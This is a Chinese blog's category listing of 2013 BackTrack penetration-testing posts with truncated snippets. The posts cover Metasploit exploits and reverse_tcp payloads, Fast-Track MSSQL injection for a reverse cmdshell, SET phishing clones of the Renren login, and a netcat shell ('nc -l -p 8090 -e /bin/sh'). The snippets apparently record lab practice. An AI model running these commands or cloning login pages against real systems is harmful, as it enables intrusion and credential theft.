backtrack
文章平均质量分 89
feier7501
这个作者很懒,什么都没留下…
展开
-
BT5入侵mssql
mssql_ping:msf auxiliary(mssql_ping) > show optionsModule options (auxiliary/scanner/mssql/mssql_ping): Name Current Setting Required Description ---- ---原创 2013-08-18 13:32:26 · 3643 阅读 · 0 评论 -
(a)ttempt SQL Ping and Auto Quick Brute Force(未完待续)
在BT5R3上,需要修改文件/pentest/exploits/fasttrack/config/fasttrack_config,改为:METASPLOIT_PATH=/opt/metasploit/app/否则会找不到msfcli。然后进入fasttrack进行操作:root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i原创 2013-07-08 23:06:58 · 1093 阅读 · 0 评论 -
SQL Injector - GET Manual Setup Binary Payload Attack
bt5上操作: ***************************************************************** ** ** ** Fast-Track - A new beginning...原创 2013-07-08 21:43:26 · 1009 阅读 · 0 评论 -
SQL Injector - POST Parameter Attack
login.jsp如下:<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>Register user username: password: bt5上操作如下:root@bt:/pentest/exploits/fasttrack原创 2013-07-08 21:32:47 · 1339 阅读 · 0 评论 -
MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell
fasttrack操作:root@bt:~# cd /pentest/exploits/fasttrack/root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i****************************************************** Performing dependency checks...原创 2013-07-08 20:23:10 · 1120 阅读 · 0 评论 -
用Tabnabbing Attack Method登录人人网
用刚才的脚本,然后输出如下: Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack原创 2013-06-22 17:30:34 · 1805 阅读 · 4 评论 -
用Credential Harvester Attack Method登录人人网
修改了一下脚步ModifyForm.py:#!/usr/bin/python# Filename: ModifyForm.pyimport sysimport osfrom pyquery import PyQuery as pqfrom src.core.setcore import *def ModifyForm(htmlPath, url): if not o原创 2013-06-22 16:34:25 · 2147 阅读 · 0 评论 -
MSSQL2K - SQL Injector - Query String Parameter Attack获得反向cmdshell
上次没有成功获得cmdshell,因为fasttrack没有这方面的代码,这次编写了server.py。原来的博客链接:http://blog.csdn.net/feier7501/article/details/9220495import socketHOST = ''PORT = 4444s = socket.socket(socket.AF_INET, socket原创 2013-07-07 16:55:25 · 1587 阅读 · 0 评论 -
Credential Harvester的脚本修改
昨天测试出现乱码。今天晚上调试,修改了一下。#!/usr/bin/python# Filename: ModifyFormAction.pyimport sysimport osfrom pyquery import PyQuery as pqdef ModifyFormAction(htmlPath, url): if not os.path.isfile(html原创 2013-06-20 23:59:00 · 1509 阅读 · 0 评论 -
Credential Harvester Attack Method获得用户信息
前段时间在学习SET,发现Credential Harvester Attack Method一直无法获得登录的用户名和密码,一开始用wireshark抓包来调试,的确没有相应的数据,后来怀疑是代码的问题,于是查看python代码。本人没学过python,因此还不得不去学习一下python。今天看代码,看到cloner.py的代码有问题。于是修改之,增加了一个新的模块:#!/usr/bin原创 2013-06-20 00:15:06 · 2634 阅读 · 0 评论 -
netcat获得反向shell
netcat下载地址:http://sourceforge.net/projects/netcat/?source=navbar在BT5上:root@bt:~# nc -l -p 8090 -e /bin/sh在XP上:E:\>nc 192.168.1.11 8090lsDesktopifconfigeth0 Link encap:Ethernet HWaddr原创 2013-07-06 17:20:40 · 3971 阅读 · 0 评论 -
Computer Based Social Engineering Tools: Social Engineer Toolkit (SET)
SET下载地址:https://github.com/trustedsec/social-engineer-toolkit/本文链接:http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_%28SET%29The So转载 2013-06-05 14:07:53 · 7000 阅读 · 0 评论 -
metasploit的SET的Credential Harvester Attack Method
环境:BT5,XP或者Win7,IE6、IE8、谷歌浏览器操作如下:root@bt:/pentest/exploits/set# ./set 01011001011011110111010100100000011100 10011001010110000101101100011011000111 1001原创 2013-05-29 23:13:22 · 1437 阅读 · 0 评论 -
metasploit、SET、Tabnabbing Attack Method(没有得到信息)
环境:BT5,火狐浏览器操作如下:root@bt:/pentest/exploits/set# ./set ________________________ __ ___/__ ____/__ __/ _____ \__ __/ __ /原创 2013-05-30 23:23:48 · 1873 阅读 · 0 评论 -
metasploit使用辅助模块
显示所有的辅助模块:msf > show auxiliaryAuxiliary========= Name Disclosure Date Rank Description ----原创 2013-05-15 22:12:28 · 13172 阅读 · 0 评论 -
metasploit的WEB攻击向量
环境:BT5R3,XP SP3,IE6XP要安装java,并且设置java环境变量操作如下:root@bt:/pentest/exploits/set# ./set .--. .--. .-----. : .--': .--'`-. .-'原创 2013-05-28 21:48:41 · 2818 阅读 · 0 评论 -
metasploit的客户端WEB攻击
环境:BT5R3,XP SP3,IE6操作如下:root@bt:/pentest/exploits/set# ./set ..######..########.######## .##....##.##..........##... .##.......##........原创 2013-05-28 22:30:15 · 3195 阅读 · 0 评论 -
metasploit文件格式漏洞渗透攻击(成功获得shell)
环境BT5R1msf > use windows/fileformat/ms11_006_createsizeddibsectionmsf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_t原创 2013-05-14 23:45:25 · 7175 阅读 · 7 评论 -
Msfpayload
http://www.offensive-security.com/metasploit-unleashed/Msfpayloadmsfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellco转载 2013-07-09 22:04:46 · 2167 阅读 · 0 评论 -
(a)ttempt SQL Ping and Auto Quick Brute Force 续2——原因
今晚再次调试,发现生成的h2b.exe无法运行,这个文件用来把hex转换成bin,而且后面的代码,似乎也有问题: print "Metasploit payload delivered.." print "Converting our payload to binary, this may take a few..." query5=("""xp_c原创 2013-07-10 22:49:55 · 888 阅读 · 0 评论 -
利用bt5和ollydbg来打开XP的shell
先产生shellcode:root@bt:~# msfpayload windows/shell/bind_tcp LPORT=443 C/* * windows/shell/bind_tcp - 298 bytes (stage 1) * http://www.metasploit.com * VERBOSE=false, LPORT=443, RHOST=, EXITFUNC=pr原创 2013-05-12 16:24:37 · 1849 阅读 · 0 评论 -
Hydra使用方法
http://www.2cto.com/Article/201305/213232.html这个也是backtrack下面很受欢迎的一个工具参数详解:-R 根据上一次进度继续破解-S 使用SSL协议连接-s 指定端口-l 指定用户名-L 指定用户名字典(文件)-p 指定密码破解-P 指定密码字典(文件)-e 空密码探测和指定用户密码探测(转载 2013-08-04 22:04:53 · 2957 阅读 · 0 评论 -
exploit/windows/smb/ms08_067_netapi
msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > show payloadsCompatible Payloads=================== Name Disclosure Dat原创 2013-07-26 23:52:59 · 3912 阅读 · 0 评论 -
metasploit之db_autopwn
BT5R1:msf > db_autopwn -h[*] Usage: db_autopwn [options] -h Display this help text -t Show all matching exploit modules -x Select modules based on原创 2013-07-26 23:11:50 · 1301 阅读 · 0 评论 -
Easy Pentesting: Metasploit's db_autopwn
http://allanfeid.com/content/easy-pentesting-metasploits-dbautopwnEveryday, life gets easier for script kiddies. These days everything is pretty much automated. I came across the db_autopwn转载 2013-07-26 23:02:10 · 970 阅读 · 0 评论 -
metasploit之db_autopwn实战
msf > db_nmap -O 192.168.1.142[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2013-05-14 20:12 EDT[*] Nmap: Nmap scan report for 192.168.1.142[*] Nmap: Host is up (0.00047s latency).[*] Nma原创 2013-07-27 00:03:38 · 5660 阅读 · 1 评论 -
metasploit之hosts
BT5R1:msf > hosts -hUsage: hosts [ options ] [addr1 addr2 ...]OPTIONS: -a,--add Add the hosts instead of searching -d,--delete Delete the hosts instead of searching -c On原创 2013-07-26 23:18:36 · 1577 阅读 · 0 评论 -
metasploit之db_nmap
BT5R1:msf > db_nmap -h[*] Nmap: Nmap 5.51SVN ( http://nmap.org )[*] Nmap: Usage: nmap [Scan Type(s)] [Options] {target specification}[*] Nmap: TARGET SPECIFICATION:[*] Nmap: Can pass hostnames,原创 2013-07-26 23:15:52 · 5404 阅读 · 0 评论 -
ms08_067被成功exploit
昨天用的环境是FC9,exploit失败。我怀疑是xp版本的问题,于是下了xp + sp2的英文版本,然后再用FC9里的metasploit来exploit,还是失败。看到作者用的是backtrack,于是,下载了一个bt4。bt4里面自带了metasploit。这次,exploit成功了。过程如下:原创 2013-04-12 22:09:58 · 5931 阅读 · 1 评论 -
MSSQL2K - SQL Injector - Query String Parameter Attack
操作如下:root@root:/pentest/exploits/fasttrack# ./fast-track.py -i****************************************************** Performing dependency checks... *******************************************原创 2013-07-01 23:11:52 · 1083 阅读 · 0 评论 -
Infectious Media Generator成功
刚才失败了,然后我把BT5虚拟机回退到先前的一个snapshot,然后再次操作,就成功了:root@bt:~# cd /pentest/exploits/set/root@bt:/pentest/exploits/set# ./setCopyright 2012, The Social-Engineer Toolkit (SET) by TrustedSec, LLCAll righ原创 2013-06-29 23:04:42 · 1251 阅读 · 0 评论 -
Arduino-Based Attack Vector
先要安装两个软件:1、Download the Arduino Software2、Download Teensyduino另外,还要从http://www.pjrc.com/购买一个Teensy设备,16-24美元。我没有买,就记录一下过程。软件安装过程:arduino的安装很简单,只要一直点下一步就可以了。teensyduino的安装如下:原创 2013-06-30 21:26:31 · 3497 阅读 · 0 评论 -
Infectious Media Generator失败
操作如下:root@bt:/pentest/exploits/set# ./set 01011001011011110111010100100000011100 10011001010110000101101100011011000111 1001001000000110100001100001011101100原创 2013-06-29 22:40:01 · 1299 阅读 · 0 评论 -
Multi-Attack Web Method
操作如下:root@bt:~# cd /pentest/exploits/set/root@bt:/pentest/exploits/set# ./set 01011001011011110111010100100000011100 10011001010110000101101100011011000111 10原创 2013-06-29 21:43:54 · 2270 阅读 · 0 评论 -
Man Left in the Middle Attack Method中间人攻击
操作如下:root@bt:/pentest/exploits/set# ./set :::=== :::===== :::==== ::: ::: :::==== ===== ====== ===原创 2013-06-27 22:48:10 · 1175 阅读 · 0 评论 -
Web Jacking Attack Method登录人人网
操作如下:root@bt:/pentest/exploits/set# ./set .--. .--. .-----. : .--': .--'`-. .-' `. `. : `; : :原创 2013-06-28 21:55:30 · 1690 阅读 · 0 评论 -
fasttrack的SQLPwnage(失败)
这次也是失败的,操作如下:root@bt:/pentest/exploits/fasttrack# ./fast-track.py -iFast-Track Main Menu: 1. Fast-Track Updates 2. Autopwn Automation 3. Nmap Scripting Engine 4. Microsoft SQL原创 2013-07-11 21:08:24 · 1014 阅读 · 0 评论 -
metasploit文件格式漏洞渗透攻击(失败)
root@bt:~# msfconsole IIIIII dTb.dTb _.---._ II 4' v 'B .'"".'/|`.""'. II 6. .P : .' / | `. : II 'T;. .;P' '.' / | `.' II 'T; ;P' `. / |原创 2013-05-13 22:29:15 · 5391 阅读 · 1 评论 -
metasploit文件格式漏洞渗透攻击(成功生成doc)
因为BT5R3失败了,所以现在换成了BT5R1。msf > use windows/fileformat/ms11_006_createsizeddibsectionmsf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcppayload => windows/mete原创 2013-05-13 23:54:58 · 2890 阅读 · 0 评论 -
Hacking Windows XP SP3 Via MS11-006 Windows Shell Graphics Processing Vulnerability
Type : TutorialLevel : MediumVictim O.S : Windows XP SP3Attacker O.S : Backtrack 5 R1Why create a tutorial about hacking Windows XP??now is the Windows 7 era so it’s better t转载 2013-05-13 22:37:09 · 1301 阅读 · 0 评论